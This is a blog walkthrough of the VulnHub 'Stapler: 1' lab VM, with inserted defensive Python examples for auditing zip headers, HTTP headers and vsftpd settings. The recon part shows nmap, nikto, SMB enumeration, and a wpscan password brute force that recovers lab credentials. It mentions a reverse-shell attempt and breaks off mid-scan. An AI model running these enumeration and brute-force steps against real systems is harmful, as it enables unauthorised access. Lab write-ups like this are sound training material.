30 March 2023

Pentesting Fun Stuff

following the cyber security path…

Stapler: 1

This is another challenge from my OSCP list. It is a challenge from 2016 and this is from its description:

+---------------------------------------------------------+
|                                                         |
|                                  __..--''\              |
|                          __..--''         \             |
|                  __..--''          __..--''             |
|          __..--''          __..--''       |             |
|          \ o        __..--''____....----""              |
|           \__..--''\                                    |
|           |         \                                   |
|          +----------------------------------+           |
|          +----------------------------------+           |
|                                                         |
+- - - - - - - - - - - - - -|- - - - - - - - - - - - - - -+
|   Name: Stapler           |          IP: DHCP           |
|   Date: 2016-June-08      |        Goal: Get Root!      |
| Author: g0tmi1k           | Difficultly: ??? ;)         |
+- - - - - - - - - - - - - -|- - - - - - - - - - - - - - -+
|                                                         |
| + Average beginner/intermediate VM, only a few twists   |
|   + May find it easy/hard (depends on YOUR background)  |
|   + ...also which way you attack the box                |
|                                                         |
| + It SHOULD work on both VMware and Virtualbox          |
|   + REBOOT the VM if you CHANGE network modes           |
|   + Fusion users, you'll need to retry when importing   |
|                                                         |
| + There are multiple methods to-do this machine         |
|   + At least two (2) paths to get a limited shell       |
|   + At least three (3) ways to get a root access        |
|                                                         |
| + Made for BsidesLondon 2016                            |
|   + Slides: https://download.vulnhub.com/media/stapler/ |
|                                                         |
| + Thanks g0tmi1k, nullmode, rasta_mouse & superkojiman  |
|   + ...and shout-outs to the VulnHub-CTF Team =)        |
|                                                         |
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - -+
|                                                         |
|       --[[~~Enjoy. Have fun. Happy Hacking.~~]]--       |
|                                                         |
+---------------------------------------------------------+

Let’s start.

Recon

What ports are open and what services are running?

root@redteam:~# nmap -n -v -T4 -sS -sV -sC -p- 192.168.50.136
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-29 20:08 CEST
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
Nmap scan report for stapler (192.168.50.136)
Host is up (0.00040s latency).
Not shown: 65523 filtered ports
PORT      STATE  SERVICE     VERSION
20/tcp    closed ftp-data
21/tcp    open   ftp         vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 550 Permission denied.
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 192.168.50.135
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp    open   ssh         OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA)
|   256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA)
|_  256 6d:01:b7:73:ac:b0:93:6f:fa:b9:89:e6:ae:3c:ab:d3 (ED25519)
53/tcp    open   domain      dnsmasq 2.75
| dns-nsid: 
|   id.server: AMS
|_  bind.version: dnsmasq-2.75
80/tcp    open   http        PHP cli server 5.5 or later
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
123/tcp   closed ntp
137/tcp   closed netbios-ns
138/tcp   closed netbios-dgm
139/tcp   open   netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
666/tcp   open   doom?
| fingerprint-strings: 
|   NULL: 
|     message2.jpgUT 
|     QWux
|     "DL[E
|     #;3[
|     \xf6
|     u([r
|     qYQq
|     Y_?n2
|     3&M~{
|     9-a)T
|     L}AJ
|_    .npy.9
3306/tcp  open   mysql       MySQL 5.7.12-0ubuntu1
| mysql-info: 
|   Protocol: 10
|   Version: 5.7.12-0ubuntu1
|   Thread ID: 7
|   Capabilities flags: 63487
|   Some Capabilities: Support41Auth, Speaks41ProtocolOld, SupportsTransactions, LongPassword, ConnectWithDatabase, IgnoreSigpipes, InteractiveClient, SupportsLoadDataLocal, SupportsCompression, DontAllowDatabaseTableColumn, LongColumnFlag, Speaks41ProtocolNew, FoundRows, IgnoreSpaceBeforeParenthesis, ODBCClient, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: g\\x0B\x16M\x1C%\x1F(5\x11 DZ\x01?\x1Eq\x7FI
|_  Auth Plugin Name: 88
12380/tcp open   http        Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:BD:3B:EA (VMware)
Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h39m59s, deviation: 34m37s, median: 1h59m58s
| nbstat: NetBIOS name: RED, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   RED<00>              Flags: <unique><active>
|   RED<03>              Flags: <unique><active>
|   RED<20>              Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   WORKGROUP<00>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|_  WORKGROUP<1e>        Flags: <group><active>
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.9-Ubuntu)
|   Computer name: red
|   NetBIOS computer name: RED\x00
|   Domain name: \x00
|   FQDN: red
|_  System time: 2019-05-29T21:09:48+01:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2019-05-29 22:09:48
|_  start_date: N/A

NSE: Script Post-scanning.
Initiating NSE at 20:10
Completed NSE at 20:10, 0.00s elapsed
Initiating NSE at 20:10
Completed NSE at 20:10, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 131.64 seconds
           Raw packets sent: 131126 (5.770MB) | Rcvd: 80 (3.372KB)

That’s a long list of ports and services. At first glance there is an FTP server with anonymous login enabled.
There are also two web servers, a Samba server and a MySQL server running.
Finally, something on port 666 returns output as well.

If you can’t remember which service normally runs on a port, /etc/services on Linux maps port numbers to service names.
As an example, I’m going to check port 3306.

root@redteam:~# cat /etc/services | grep 3306
mysql		3306/tcp
mysql		3306/udp

FTP

Anonymous login is enabled, so let’s see what is inside.

root@redteam:~# ftp
ftp> open red
Connected to red.
220-
220-|-----------------------------------------------------------------------------------------|
220-| Harry, make sure to update the banner when you get a chance to show who has access here |
220-|-----------------------------------------------------------------------------------------|
220-
220 
Name (red:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> 

That gives a possible username: harry.
But which banner?

root@redteam:~# ssh 192.168.50.136
The authenticity of host '192.168.50.136 (192.168.50.136)' can't be established.
ECDSA key fingerprint is SHA256:WuY26BwbaoIOawwEIZRaZGve4JZFaRo7iSvLNoCwyfA.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.50.136' (ECDSA) to the list of known hosts.
-----------------------------------------------------------------
~          Barry, don't forget to put a message here           ~
-----------------------------------------------------------------

No password yet, so moving on.

ftp> ls -lah
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 Jun 04  2016 .
drwxr-xr-x    2 0        0            4096 Jun 04  2016 ..
-rw-r--r--    1 0        0             107 Jun 03  2016 note
226 Directory send OK.
ftp> get note
local: note remote: note
200 Switching to Binary mode.
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note (107 bytes).
226 Transfer complete.
107 bytes received in 0.00 secs (105.9758 kB/s)
root@redteam:~# cat note
Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.

Two more possible usernames: elly and john.
I put the usernames into a list for later use.

root@redteam:~# echo -e "harry\nelly\njohn" > usernames.txt

Port 666

Connecting to port 666 returns unreadable output, which I redirect into a file.

root@redteam:~# nc -v red 666 | tee -a output
root@redteam:~# file output 
output: Zip archive data, at least v2.0 to extract

A zip file.

root@redteam:~# unzip output
Archive:  output
  inflating: message2.jpg
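
The `file` verdict and the odd strings in the nmap fingerprint ("message2.jpgUT") both come from the zip local file header, which starts every zip stream with the member name in clear text. The following Python, an added example that is not part of the original write-up, classifies a blob by its magic bytes and walks those headers. It builds its own small zip in memory as a constructed stand-in for the port 666 data, so it runs offline; the `UT` seen by nmap is the Info-ZIP extended-timestamp extra-field id, which Python's zipfile does not emit, so the sample's extra field is empty.

```python
import io
import struct
import zipfile

# Magic bytes for the two file types that turn up on port 666.
ZIP_LOCAL_HEADER = b"PK\x03\x04"
JPEG_SOI = b"\xff\xd8\xff"


def build_sample_zip() -> bytes:
    """Constructed sample: a small zip holding a fake 'message2.jpg', built in
    memory so the header layout is genuine. Stands in for the port 666 data."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("message2.jpg", JPEG_SOI + b"\xe0" + b"constructed jpeg body" * 20)
    return buf.getvalue()


def identify(blob: bytes) -> str:
    """Minimal stand-in for `file`: classify by the leading magic bytes."""
    if blob.startswith(ZIP_LOCAL_HEADER):
        return "zip"
    if blob.startswith(JPEG_SOI):
        return "jpeg"
    return "unknown"


def parse_local_headers(blob: bytes) -> list:
    """Walk the zip local file headers: 30 fixed bytes, then the member name in
    clear text (which is why nmap's fingerprint shows 'message2.jpg'), then the
    extra field ('UT' = Info-ZIP extended timestamp), then the compressed data.
    Assumes sizes are in the local header, i.e. the data-descriptor flag is clear."""
    entries = []
    off = 0
    while blob[off:off + 4] == ZIP_LOCAL_HEADER:
        (_sig, need_ver, flags, method, _mtime, _mdate, _crc,
         csize, usize, nlen, xlen) = struct.unpack("<4sHHHHHIIIHH", blob[off:off + 30])
        if flags & 0x08:
            raise ValueError("data descriptor in use; sizes are stored after the data")
        name = blob[off + 30:off + 30 + nlen].decode("utf-8", "replace")
        extra = blob[off + 30 + nlen:off + 30 + nlen + xlen]
        entries.append({
            "name": name,
            "method": {0: "store", 8: "deflate"}.get(method, str(method)),
            "needs_version": need_ver / 10,   # 20 -> 2.0, as in file's "at least v2.0"
            "compressed_size": csize,
            "uncompressed_size": usize,
            "extra_field_id": extra[:2],      # b"UT" when extended timestamps are present
        })
        off += 30 + nlen + xlen + csize
    return entries


if __name__ == "__main__":
    sample = build_sample_zip()
    print(identify(sample))
    for entry in parse_local_headers(sample):
        print(entry)
```

Reading the header rather than trusting the extension is the same check `file` performs, and it is the reason a service that streams an archive is recognisable even when the port itself (666, labelled "doom?" by nmap) says nothing about the content.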

The picture contains another possible username and a message about a segmentation fault, which could suggest a buffer overflow.

root@redteam:~# exiftool message2.jpg 
ExifTool Version Number         : 11.16
File Name                       : message2.jpg
Directory                       : .
File Size                       : 13 kB
File Modification Date/Time     : 2016:06:03 17:03:07+02:00
File Access Date/Time           : 2019:05:29 20:54:52+02:00
File Inode Change Date/Time     : 2019:05:29 20:53:20+02:00
File Permissions                : rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : None
X Resolution                    : 72
Y Resolution                    : 72
Current IPTC Digest             : 020ab2da2a37c332c141ebf819e37e6d
Contact                         : If you are reading this, you should get a cookie!
Application Record Version      : 4
IPTC Digest                     : d41d8cd98f00b204e9800998ecf8427e
Image Width                     : 364
Image Height                    : 77
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:4:4 (1 1)
Image Size                      : 364x77
Megapixels                      : 0.028

There is some useful metadata inside this picture. Getting a cookie? Ok.

Webservers

I thought I would get a cookie when browsing the website at port 12380, but no cookie.
There are some comments in the source page.

<title>Tim, we need to-do better next year for Initech</title>
<!-- A message from the head of our HR department, Zoe, if you are looking at this, we want to hire you! -->

More usernames for the file.
My directory brute force attempts came up empty, so maybe Nikto has better luck.

root@redteam:~# nikto -h http://192.168.50.136
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.50.136
+ Target Hostname:    192.168.50.136
+ Target Port:        80
+ Start Time:         2019-05-29 22:17:40 (GMT2)
---------------------------------------------------------------------------
+ Server: No banner retrieved
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-3093: /.bashrc: User home dir was found with a shell rc file. This may reveal file and path information.
+ OSVDB-3093: /.profile: User home dir with a shell profile was found. May reveal directory information and system configuration.
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
+ Scan terminated:  20 error(s) and 5 item(s) reported on remote host
+ End Time:           2019-05-29 22:18:00 (GMT2) (20 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@redteam:~# nikto -h 192.168.50.136:12380
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.50.136
+ Target Hostname:    192.168.50.136
+ Target Port:        12380
---------------------------------------------------------------------------
+ SSL Info:        Subject:  /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
                   Ciphers:  ECDHE-RSA-AES256-GCM-SHA384
                   Issuer:   /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
+ Start Time:         2019-05-29 22:17:55 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'dave' found, with contents: Soemthing doesn't look right here
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The site uses SSL and Expect-CT header is not present.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/admin112233/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/blogblog/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Hostname '192.168.50.136' does not match certificate's names: Red.Initech
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 8071 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time:           2019-05-29 22:20:59 (GMT2) (184 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

These scans look promising. The first one finds files that reside in a user’s home folder, so there may be LFI possibilities.
The second scan shows a robots.txt file with two entries, a phpMyAdmin page and an SSL certificate with some useful information.
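
The missing-header and "uncommon header" lines in the two Nikto reports are the kind of check a defender can run against their own responses before a scanner does. The Python below is an added example, not code from the original write-up or from Nikto: it audits one set of response headers for missing hardening headers, unfamiliar headers and version disclosure. The two header dictionaries are constructed to mirror what the scans above reported (no banner on port 80; Apache plus the `dave` and `x-ob_mode` headers on 12380), and Content-Security-Policy is included as a check that goes slightly beyond Nikto's list.

```python
# Constructed response headers mirroring what the two nikto scans above report:
# port 80 sends no Server banner at all; port 12380 is Apache with two odd
# custom headers ("dave" and "x-ob_mode").
PORT_80_RESPONSE = {
    "Content-Type": "text/html; charset=UTF-8",
}
PORT_12380_RESPONSE = {
    "Server": "Apache/2.4.18 (Ubuntu)",
    "Content-Type": "text/html",
    "dave": "Soemthing doesn't look right here",
    "x-ob_mode": "1",
}

# Hardening headers a web service is expected to send, with the risk each one
# addresses (nikto checks the first two; CSP is added as the usual companion).
EXPECTED = {
    "X-Frame-Options": "clickjacking",
    "X-Content-Type-Options": "MIME sniffing",
    "Content-Security-Policy": "script injection / XSS",
}
EXPECTED_TLS = {
    "Strict-Transport-Security": "TLS stripping / downgrade",
}
# Header names treated as ordinary; anything else is reported for manual review,
# which is how the odd "dave" header surfaces.
KNOWN = {
    "server", "date", "content-type", "content-length", "connection", "cache-control",
    "set-cookie", "location", "vary", "etag", "last-modified", "expires", "pragma",
    "content-encoding", "transfer-encoding", "keep-alive", "x-powered-by",
    "expect-ct", "referrer-policy", "permissions-policy", "x-xss-protection",
    *(h.lower() for h in EXPECTED), *(h.lower() for h in EXPECTED_TLS),
}


def audit_headers(headers: dict, tls: bool = False) -> dict:
    """Return missing hardening headers, uncommon headers and version
    disclosure for one HTTP response (names compared case-insensitively)."""
    present = {name.lower(): value for name, value in headers.items()}
    checks = dict(EXPECTED)
    if tls:
        checks.update(EXPECTED_TLS)
    findings = {
        "missing": [f"{name} ({risk})" for name, risk in checks.items()
                    if name.lower() not in present],
        "uncommon": sorted(name for name in present if name not in KNOWN),
        "disclosure": [],
    }
    # A Server/X-Powered-By value with a version number tells a reader exactly what to look up.
    for name in ("server", "x-powered-by"):
        value = present.get(name, "")
        if any(ch.isdigit() for ch in value):
            findings["disclosure"].append(f"{name}: {value}")
    return findings


if __name__ == "__main__":
    print("port 80:   ", audit_headers(PORT_80_RESPONSE))
    print("port 12380:", audit_headers(PORT_12380_RESPONSE, tls=True))
```

On Apache the fixes are one-liners with mod_headers (`Header always set X-Content-Type-Options "nosniff"`, `Header always set X-Frame-Options "SAMEORIGIN"`, and `Strict-Transport-Security` on the TLS virtual host), and `ServerTokens Prod` removes the version from the banner that both Nikto and nmap reported.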

It seems I checked out HTTP, but forgot HTTPS. When browsing to /admin112233/ I get a pop-up.

The /blogblog/ entry takes me to a WordPress site, and I navigate to the wp-admin page.

So there is a john user, but the password is just not correct. Time for wpscan.
When using wpscan here, the --disable-tls-checks option is essential: without it the scan aborts because of the certificate.

The scan says the site runs WordPress 4.2.1, a version with some known vulnerabilities.
I also got some valid credentials, so that was what I wanted to investigate first, as it’s relatively easy.

[i] User(s) Identified:

[+] john
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] barry
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] elly
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] peter
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] heather
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] garry
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] harry
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] scott
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] tim
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] kathy
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] Performing password attack on Xmlrpc Multicall against 1 user/s
[SUCCESS] - john / incorrect                                                                                                                                                                                      
All Found                                                                                                                                                                                                         
Progress Time: 00:05:32 <==========                                                                                                                                           > (155 / 1999)  7.75%  ETA: ??:??:??

[i] Valid Combinations Found:
[SUCCESS] - garry / football                                                                                                                                                                                      
[SUCCESS] - harry / monkey                                                                                                                                                                                        
[SUCCESS] - scott / cookie                                                                                                                                                                                        
[SUCCESS] - tim / thumb                                                                                                                                                                                           
[SUCCESS] - kathy / coolgirl                                                                                                                                                                                      
[SUCCESS] - john / incorrect

For brute forcing the passwords I used a password list from SecLists.
I tried Harry first, but this user has no useful rights, so I try Tim next.

Tim has the same rights, and so does Kathy. They can’t do anything without it first being approved by the admin, and it looks like that is John.

There are several ways to get a reverse shell from WordPress, but in this case it wasn’t that simple. What I tried:

  • altering the 404 page by replacing the PHP code with the reverse shell from pentestmonkey. This didn’t work because the files weren’t writable.

  • installing a plugin. This also did not work, because I needed to supply FTP credentials.

After some time I decided to move on to another service, because there was much more to go on. Maybe I would find something useful along the way.

SMB

Because connecting to the MySQL server needs a password, I go for the SMB server first.

root@redteam:~# smbclient -L 192.168.50.136
Enter WORKGROUP\root's password: 

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	kathy           Disk      Fred, What are we doing here?
	tmp             Disk      All temporary files should be stored here
	IPC$            IPC       IPC Service (red server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.

	Server               Comment
	---------            -------

	Workgroup            Master
	---------            -------
	WORKGROUP            RED
root@redteam:~/tmp/backup# smbmap -H 192.168.50.136 -P 139
[+] Finding open SMB ports....
[+] Guest RPC session established on 192.168.50.136...
[+] IP: 192.168.50.136:139	Name: red                                               
	Disk                                                  	Permissions
	----                                                  	-----------
	print$                                            	NO ACCESS
	kathy                                             	READ ONLY
	tmp                                               	READ, WRITE
	IPC$                                              	NO ACCESS

Another option that Kali has to enumerate an SMB server is a Perl script named enum4linux. This script has many options, but for now I’m going to enumerate users via RID cycling.

S-1-22-1-1001 Unix User\RNunemaker (Local User)
S-1-22-1-1002 Unix User\ETollefson (Local User)
S-1-22-1-1003 Unix User\DSwanger (Local User)
S-1-22-1-1004 Unix User\AParnell (Local User)
S-1-22-1-1005 Unix User\SHayslett (Local User)
S-1-22-1-1006 Unix User\MBassin (Local User)
S-1-22-1-1007 Unix User\JBare (Local User)
S-1-22-1-1008 Unix User\LSolum (Local User)
S-1-22-1-1009 Unix User\IChadwick (Local User)
S-1-22-1-1010 Unix User\MFrei (Local User)
S-1-22-1-1011 Unix User\SStroud (Local User)
S-1-22-1-1012 Unix User\CCeaser (Local User)
S-1-22-1-1013 Unix User\JKanode (Local User)
S-1-22-1-1014 Unix User\CJoo (Local User)
S-1-22-1-1015 Unix User\Eeth (Local User)
S-1-22-1-1016 Unix User\LSolum2 (Local User)
S-1-22-1-1017 Unix User\JLipps (Local User)
S-1-22-1-1018 Unix User\jamie (Local User)
S-1-22-1-1019 Unix User\Sam (Local User)
S-1-22-1-1020 Unix User\Drew (Local User)
S-1-22-1-1021 Unix User\jess (Local User)
S-1-22-1-1022 Unix User\SHAY (Local User)
S-1-22-1-1023 Unix User\Taylor (Local User)
S-1-22-1-1024 Unix User\mel (Local User)
S-1-22-1-1025 Unix User\kai (Local User)
S-1-22-1-1026 Unix User\zoe (Local User)
S-1-22-1-1027 Unix User\NATHAN (Local User)
S-1-22-1-1028 Unix User\www (Local User)
S-1-22-1-1029 Unix User\elly (Local User)

Now to filter out the usernames and store them in the usernames.txt file.

root@redteam:~# cat rid.list | cut -d '\' -f2 | awk '{print $1}' | tr '[:upper:]' '[:lower:]' >> usernames.txt

After checking the list, it seems that I have duplicates.

root@redteam:~# cat usernames.txt | sort -u > usernames.list

From the scans it looks like the tmp share is writable, but let’s try the Kathy share first.

root@redteam:~# smbclient \\\\192.168.50.136\\kathy
Enter WORKGROUP\root's password: 
Try "help" to get a list of possible commands.
smb: \> ls -lah
NT_STATUS_NO_SUCH_FILE listing \-lah
smb: \> ls
  .                                   D        0  Fri Jun  3 18:52:52 2016
  ..                                  D        0  Mon Jun  6 23:39:56 2016
  kathy_stuff                         D        0  Sun Jun  5 17:02:27 2016
  backup                              D        0  Sun Jun  5 17:04:14 2016

		19478204 blocks of size 1024. 16396568 blocks available

From this share I get three files:

-rw-r--r--  1 root root   64 May 29 21:29 todo-list.txt
-rw-r--r--  1 root root 5.9K May 29 21:29 vsftpd.conf
-rw-r--r--  1 root root 6.1M May 29 21:30 wordpress-4.tar.gz
root@redteam:~/tmp# cat todo-list.txt
I'm making sure to backup anything important for Initech, Kathy
root@redteam:~/tmp# cat vsftpd.conf
listen=YES
listen_ipv6=NO
anonymous_enable=YES
anon_root=/var/ftp/anonymous
local_enable=YES
dirmessage_enable=YES
use_localtime=YES
xferlog_enable=YES
connect_from_port_20=YES
banner_file=/etc/vsftpd.banner
chroot_local_user=YES
userlist_enable=YES
local_root=/etc
secure_chroot_dir=/var/run/vsftpd/empty
pam_service_name=vsftpd
rsa_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem
rsa_private_key_file=/etc/ssl/private/ssl-cert-snakeoil.key
ssl_enable=NO
pasv_enable=no
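
A leaked vsftpd.conf like this one is worth reading as a configuration review, not just as loot: it explains the anonymous login nmap found, why the ftp-anon script got "PASV failed: 550 Permission denied", and where local users land when they log in. The Python below is an added example, not part of the original write-up or of vsftpd: it parses the directives (with the defaults from vsftpd.conf(5) for anything absent) and flags the risky settings, with a constructed hardened counterpart beside the recovered file. The directive names in the hardened version are real vsftpd options; the port range is an assumed value.

```python
# Copy of the vsftpd.conf recovered from the kathy share above, used as input.
WEAK_CONF = """\
listen=YES
listen_ipv6=NO
anonymous_enable=YES
anon_root=/var/ftp/anonymous
local_enable=YES
dirmessage_enable=YES
chroot_local_user=YES
userlist_enable=YES
local_root=/etc
ssl_enable=NO
pasv_enable=no
"""

# Constructed hardened counterpart (directive names are real vsftpd options;
# the passive port range is an assumed value).
HARDENED_CONF = """\
listen=YES
listen_ipv6=NO
anonymous_enable=NO
local_enable=YES
chroot_local_user=YES
allow_writeable_chroot=NO
userlist_enable=YES
ssl_enable=YES
force_local_logins_ssl=YES
force_local_data_ssl=YES
pasv_enable=YES
pasv_min_port=40000
pasv_max_port=40100
"""

TRUE_VALUES = {"yes", "true", "1"}
# Values vsftpd applies when a directive is absent (vsftpd.conf(5)).
DEFAULTS = {
    "anonymous_enable": "YES",
    "local_enable": "NO",
    "chroot_local_user": "NO",
    "ssl_enable": "NO",
    "pasv_enable": "YES",
    "anon_upload_enable": "NO",
    "anon_mkdir_write_enable": "NO",
}


def parse_vsftpd_conf(text: str) -> dict:
    """Parse key=value lines, skipping blanks and comments; keys are case-insensitive."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        conf[key.strip().lower()] = value.strip()
    return conf


def enabled(conf: dict, key: str) -> bool:
    """Boolean directives accept YES/NO, TRUE/FALSE and 1/0 in any case."""
    return conf.get(key, DEFAULTS.get(key, "NO")).lower() in TRUE_VALUES


def audit_vsftpd(conf: dict) -> list:
    """Return (code, explanation) pairs for the risky settings found."""
    findings = []
    if enabled(conf, "anonymous_enable"):
        findings.append(("anonymous_login", "anonymous_enable=YES: anyone can log in and read anon_root"))
        if enabled(conf, "anon_upload_enable") or enabled(conf, "anon_mkdir_write_enable"):
            findings.append(("anonymous_write", "anonymous users may also upload or create directories"))
    if enabled(conf, "local_enable") and not enabled(conf, "ssl_enable"):
        findings.append(("plaintext_auth", "ssl_enable=NO: local account passwords cross the network in clear text"))
    if enabled(conf, "local_enable") and not enabled(conf, "chroot_local_user"):
        findings.append(("no_chroot", "chroot_local_user=NO: local users can browse the whole filesystem"))
    local_root = conf.get("local_root", "")
    if local_root and not local_root.startswith("/home"):
        findings.append(("local_root_outside_home", f"local_root={local_root}: local users land in a system directory"))
    if not enabled(conf, "pasv_enable"):
        # Matches the "PASV failed: 550 Permission denied" in the nmap ftp-anon output above.
        findings.append(("pasv_disabled", "pasv_enable=NO: clients must fall back to active (PORT) mode"))
    return findings


if __name__ == "__main__":
    for label, text in (("recovered", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(label)
        for code, why in audit_vsftpd(parse_vsftpd_conf(text)):
            print(f"  [{code}] {why}")
```

Note that the audit treats an empty file as risky: vsftpd's own default for anonymous_enable is YES, so a configuration that never mentions the directive still allows anonymous logins.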

Now for the tmp share.

root@redteam:~/tmp/backup# smbclient \\\\192.168.50.136\\tmp
Enter WORKGROUP\root's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed May 29 23:39:18 2019
  ..                                  D        0  Mon Jun  6 23:39:56 2016
  ls                                  N      274  Sun Jun  5 17:32:58 2016

		19478204 blocks of size 1024. 16396552 blocks available
root@redteam:~/tmp/backup# cat ls
.:
total 12.0K
drwxrwxrwt  2 root root 4.0K Jun  5 16:32 .
drwxr-xr-x 16 root root 4.0K Jun  3 22:06 ..
-rw-r--r--  1 root root    0 Jun  5 16:32 ls
drwx------  3 root root 4.0K Jun  5 15:32 systemd-private-df2bff9b90164a2eadc490c0b8f76087-systemd-timesyncd.service-vFKoxJ

A text file with a directory listing. From here I can’t really do anything with it.

UDP

Because FTP plays such a role in this challenge, I decided to check the UDP side as well.

root@redteam:~# cat /etc/services | grep ftp
ftp-data	20/tcp
ftp		21/tcp
tftp		69/udp
root@redteam:~# nmap -n -T4 -sU -sV -sC -p 69 192.168.50.136
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-31 10:59 CEST
Stats: 0:00:21 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 0.00% done
Nmap scan report for 192.168.50.136
Host is up (0.00024s latency).

